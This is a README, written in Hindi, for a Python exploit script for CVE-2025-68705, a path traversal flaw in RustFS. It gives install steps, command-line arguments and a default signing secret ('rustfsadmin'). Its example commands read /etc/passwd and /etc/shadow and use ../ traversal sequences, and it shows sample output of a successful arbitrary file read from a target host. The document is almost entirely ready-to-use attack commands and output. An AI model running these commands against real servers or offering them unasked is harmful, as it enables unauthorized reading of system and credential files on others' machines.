
CVE-2025-68705 के लिए Python एक्सप्लॉइट स्क्रिप्ट, RustFS में एक पथ ट्रैवर्सल कमजोरी, जो लक्ष्य सर्वरों पर मनमाना फ़ाइल पढ़ने और कमजोरी की जाँच को सक्षम बनाती है।
यह स्क्रिप्ट RustFS में एक पथ पारगमन भेद्यता (CVE-2025-68705) का शोषण करती है जो सर्वर पर मनमानी फ़ाइलों को पढ़ने की अनुमति देती है।
requirements.txt देखेंgit clone https://github.com/yourusername/CVE-2025-68705.git
cd CVE-2025-68705
pip install -r requirements.txt
python exp.py -H <host> -p <port> -f <file_path> [-s <secret>]
| तर्क | विवरण |
|---|---|
-H, --host | लक्ष्य होस्ट IP या होस्टनाम |
-p, --port | लक्ष्य पोर्ट संख्या |
-f, --file | पढ़ने के लिए फ़ाइल पथ (--check-only के साथ वैकल्पिक) |
| तर्क | विवरण | डिफ़ॉल्ट |
|---|---|---|
-s, --secret | हस्ताक्षर के लिए गुप्त कुंजी | rustfsadmin |
-o, --offset | फ़ाइल पढ़ने का ऑफ़सेट | 0 |
-l, --length | पढ़ने के लिए बाइट्स की संख्या | 4096 |
--check-only | केवल यह जाँचें कि लक्ष्य असुरक्षित है या नहीं | - |
python exp.py -H 192.168.1.128 -p 9000 -f /etc/passwd
python exp.py -H 192.168.1.128 -p 9000 -f /etc/shadow -o 0 -l 1024
python exp.py -H 192.168.1.128 -p 9000 -f /etc/hosts -s customsecret
python exp.py -H 192.168.1.128 -p 9000 --check-only
python exp.py -H 192.168.1.128 -p 9000 -f /etc/passwd -o 100 -l 200
python ./exp.py -H 192.168.1.128 -p 19010 -f ../../../../etc/hosts -o 0 -l 100
[*] Target: 192.168.1.128:19010
[*] Secret: rustfsadmin
--------------------------------------------------
[*] Checking for CVE-2025-68705 vulnerability...
[*] Exploiting CVE-2025-68705 against 192.168.1.128:19010
[*] Reading file: ../../../../etc/passwd
[+] Target is VULNERABLE!
--------------------------------------------------
[*] Exploiting CVE-2025-68705 against 192.168.1.128:19010
[*] Reading file: ../../../../../../../../etc/hosts
[+] Successfully read file!
[+] File content (offset=0, length=100):
--------------------------------------------------
127.0.0.1 localhost
::1 localhost ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastp
यह प्रोजेक्ट MIT लाइसेंस के अंतर्गत लाइसेंस प्राप्त है - विवरण के लिए LICENSE फ़ाइल देखें।